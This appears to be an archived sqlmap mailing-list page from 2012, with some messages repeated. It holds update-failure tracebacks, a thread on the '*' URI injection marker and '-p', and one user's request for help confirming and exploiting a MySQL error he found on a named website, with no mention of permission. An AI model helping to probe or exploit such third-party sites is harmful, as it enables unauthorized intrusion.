> [!] Legal Disclaimer: usage of sqlmap for attacking web servers without
> prior mutual consent can be considered as an illegal activity. it is the
> final user's responsibility to obey all applicable local, state and federal
> laws. authors assume no liability and are not responsible for any misuse or
> damage caused by this program.
>
> [*] starting at: 20:30:27
>
> [20:30:28] [INFO] updating sqlmap to latest development version from the
> subversion repository
> D /pentest/database/sqlmap/txt/oracle-default-passwords.txt
> A /pentest/database/sqlmap/txt/smalldict.txt
> A /pentest/database/sqlmap/plugins/dbms/db2
> A /pentest/database/sqlmap/plugins/dbms/db2/connector.py
> A /pentest/database/sqlmap/plugins/dbms/db2/__init__.py
> A /pentest/database/sqlmap/plugins/dbms/db2/takeover.py
> A /pentest/database/sqlmap/plugins/dbms/db2/filesystem.py
> A /pentest/database/sqlmap/plugins/dbms/db2/enumeration.py
> A /pentest/database/sqlmap/plugins/dbms/db2/syntax.py
> A /pentest/database/sqlmap/plugins/dbms/db2/fingerprint.py
> A /pentest/database/sqlmap/_sqlmap.py
> D /pentest/database/sqlmap/extra/xmlobject
> A /pentest/database/sqlmap/extra/beautifulsoup
> A /pentest/database/sqlmap/extra/beautifulsoup/__init__.py
> A /pentest/database/sqlmap/extra/beautifulsoup/beautifulsoup.py
> A /pentest/database/sqlmap/doc/FAQ.pdf
> A /pentest/database/sqlmap/doc/FAQ.html
> A /pentest/database/sqlmap/lib/utils/hashdb.py
>
> [20:34:04] [CRITICAL] unhandled exception in sqlmap/1.0-dev (r4009), retry
> your run with the latest development version from the Subversion repository.
> If the exception persists, please send by e-mail to
> sql...@li... the following text and any information
> required to reproduce the bug. The developers will try to reproduce the bug,
> fix it accordingly and get back to you.
> sqlmap version: 1.0-dev (r4009)
> Python version: 2.6.5
> Operating system: posix
> Command line: ./sqlmap.py --update
> Technique: None
> Back-end DBMS: None (identified)
> Traceback (most recent call last):
>   File "./sqlmap.py", line 78, in main
>   File "/pentest/database/sqlmap/lib/core/option.py", line 1752, in init
>     update()
>   File "/pentest/database/sqlmap/lib/core/update.py", line 71, in update
>     client.update(rootDir)
> ClientError: callback_get_login required
>
> [*] shutting down at: 20:34:04
>
> root@bt:/pentest/database/sqlmap# ./sqlmap.py --update
> Traceback (most recent call last):
>   File "./sqlmap.py", line 17, in <module>
>     from _sqlmap import main
>   File "/pentest/database/sqlmap/_sqlmap.py", line 27, in <module>
>     from lib.controller.controller import start
>   File "/pentest/database/sqlmap/lib/controller/controller.py", line 13, in
> <module>
>     from lib.controller.action import action
>   File "/pentest/database/sqlmap/lib/controller/action.py", line 10, in
> <module>
>     from lib.controller.handler import setHandler
>   File "/pentest/database/sqlmap/lib/controller/handler.py", line 27, in
> <module>
>     from plugins.dbms.mssqlserver import MSSQLServerMap
>   File "/pentest/database/sqlmap/plugins/dbms/mssqlserver/__init__.py", line
> 14, in <module>
>     from plugins.dbms.mssqlserver.enumeration import Enumeration
>   File "/pentest/database/sqlmap/plugins/dbms/mssqlserver/enumeration.py",
> line 28, in <module>
>     from plugins.generic.enumeration import Enumeration as
> GenericEnumeration
>   File "/pentest/database/sqlmap/plugins/generic/enumeration.py", line 16,
> in <module>
>     from lib.core.common import BigArray
> ImportError: cannot import name BigArray
> root@bt:/pentest/database/sqlmap#

--
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website
From: Bernardo D. A. G. <ber...@gm...> - 2012-01-05 18:05:35
It does not count as a bug. That's the expected behaviour.

Bernardo Damele A. G.

This message was sent from a smartphone

On 5 Jan 2012, at 14:46, Chris Oakley <chr...@gm...> wrote:

-p will definitely work, no need for * when it's not rewritten URLs.

Not sure if that counts as a bug therefore... so in the meantime, just use -p

Chris

On 5 January 2012 13:53, Gianluca Brindisi <g...@br...> wrote:
> Hello,
> if I provide an URL with * like this:
>
> http://target.com/path/to/index.php?id=12*&action=add&path=/path/to/&imgIndex=
>
> sqlmap doesn't recognize valid get param in the urls:
>
> [15:34:23] [WARNING] you've provided target url without any GET parameters
> (e.g. www.site.com/article.php?id=1) and without providing any POST
> parameters through --data option
> do you want to try URI injections in the target url itself? [Y/n/q]
>
> But looks like it injects correctly where I placed the wildcard.
>
> Instead without * everything is working fine as usual.
> So I am not sure if this is some sort of bug or it's me misusing the *
> option (i.e. if the url is not rewritten I should just use -p id).
>
> Thanks,
> Gianluca Brindisi
From: Borja B. <bor...@gm...> - 2012-01-05 15:52:22
Hi !

This is my first mail to this list, as I'm an active user of the software I had to start mailing here someday so... here is my question:

I've found a MySQL error on a website (by a modification in the URL) that throws me this:

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/virtual/thewebsite.com/web/news/index.php on line 11

The syntax of the url is '' http://www.thewebsite.com/news/today/*/'' and in the normal state of the URL there is a number (of the news page shown) where I have written the *.

If I write anything that is not a number it returns me the error.

I'm having two problems here:

First one is that I'm not sure if I'm doing right the URI injection with sqlmap because I've found 3 URI injections in different places but without success. (I'm using the * to show the tool where to test)

And the other one is that I'm not really sure if that error shows a really exploitable flaw.

Sqlmap, by using the * wildcard, throws some possible UNION exploitable points, but are discarded when finished the tests. I have tried also with --union-char switch with different characters.

Sorry for all this text, hope you could help me a bit :S

Thanks !
From: Abhishek M. <leo...@gm...> - 2012-01-05 15:12:00
root@bt:/pentest/database/sqlmap# ./sqlmap.py --update

sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 20:30:27

[20:30:28] [INFO] updating sqlmap to latest development version from the subversion repository
D /pentest/database/sqlmap/txt/oracle-default-passwords.txt
A /pentest/database/sqlmap/txt/smalldict.txt
A /pentest/database/sqlmap/plugins/dbms/db2
A /pentest/database/sqlmap/plugins/dbms/db2/connector.py
A /pentest/database/sqlmap/plugins/dbms/db2/__init__.py
A /pentest/database/sqlmap/plugins/dbms/db2/takeover.py
A /pentest/database/sqlmap/plugins/dbms/db2/filesystem.py
A /pentest/database/sqlmap/plugins/dbms/db2/enumeration.py
A /pentest/database/sqlmap/plugins/dbms/db2/syntax.py
A /pentest/database/sqlmap/plugins/dbms/db2/fingerprint.py
A /pentest/database/sqlmap/_sqlmap.py
D /pentest/database/sqlmap/extra/xmlobject
A /pentest/database/sqlmap/extra/beautifulsoup
A /pentest/database/sqlmap/extra/beautifulsoup/__init__.py
A /pentest/database/sqlmap/extra/beautifulsoup/beautifulsoup.py
A /pentest/database/sqlmap/doc/FAQ.pdf
A /pentest/database/sqlmap/doc/FAQ.html
A /pentest/database/sqlmap/lib/utils/hashdb.py

[20:34:04] [CRITICAL] unhandled exception in sqlmap/1.0-dev (r4009), retry your run with the latest development version from the Subversion repository. If the exception persists, please send by e-mail to sql...@li... the following text and any information required to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you.
sqlmap version: 1.0-dev (r4009)
Python version: 2.6.5
Operating system: posix
Command line: ./sqlmap.py --update
Technique: None
Back-end DBMS: None (identified)
Traceback (most recent call last):
  File "./sqlmap.py", line 78, in main
  File "/pentest/database/sqlmap/lib/core/option.py", line 1752, in init
    update()
  File "/pentest/database/sqlmap/lib/core/update.py", line 71, in update
    client.update(rootDir)
ClientError: callback_get_login required

[*] shutting down at: 20:34:04

root@bt:/pentest/database/sqlmap# ./sqlmap.py --update
Traceback (most recent call last):
  File "./sqlmap.py", line 17, in <module>
    from _sqlmap import main
  File "/pentest/database/sqlmap/_sqlmap.py", line 27, in <module>
    from lib.controller.controller import start
  File "/pentest/database/sqlmap/lib/controller/controller.py", line 13, in <module>
    from lib.controller.action import action
  File "/pentest/database/sqlmap/lib/controller/action.py", line 10, in <module>
    from lib.controller.handler import setHandler
  File "/pentest/database/sqlmap/lib/controller/handler.py", line 27, in <module>
    from plugins.dbms.mssqlserver import MSSQLServerMap
  File "/pentest/database/sqlmap/plugins/dbms/mssqlserver/__init__.py", line 14, in <module>
    from plugins.dbms.mssqlserver.enumeration import Enumeration
  File "/pentest/database/sqlmap/plugins/dbms/mssqlserver/enumeration.py", line 28, in <module>
    from plugins.generic.enumeration import Enumeration as GenericEnumeration
  File "/pentest/database/sqlmap/plugins/generic/enumeration.py", line 16, in <module>
    from lib.core.common import BigArray
ImportError: cannot import name BigArray
root@bt:/pentest/database/sqlmap#
From: Chris O. <chr...@gm...> - 2012-01-05 14:46:32
-p will definitely work, no need for * when it's not rewritten URLs.

Not sure if that counts as a bug therefore... so in the meantime, just use -p

Chris

On 5 January 2012 13:53, Gianluca Brindisi <g...@br...> wrote:
> Hello,
> if I provide an URL with * like this:
>
> http://target.com/path/to/index.php?id=12*&action=add&path=/path/to/&imgIndex=
>
> sqlmap doesn't recognize valid get param in the urls:
>
> [15:34:23] [WARNING] you've provided target url without any GET parameters
> (e.g. www.site.com/article.php?id=1) and without providing any POST
> parameters through --data option
> do you want to try URI injections in the target url itself? [Y/n/q]
>
> But looks like it injects correctly where I placed the wildcard.
>
> Instead without * everything is working fine as usual.
> So I am not sure if this is some sort of bug or it's me misusing the *
> option (i.e. if the url is not rewritten I should just use -p id).
>
> Thanks,
> Gianluca Brindisi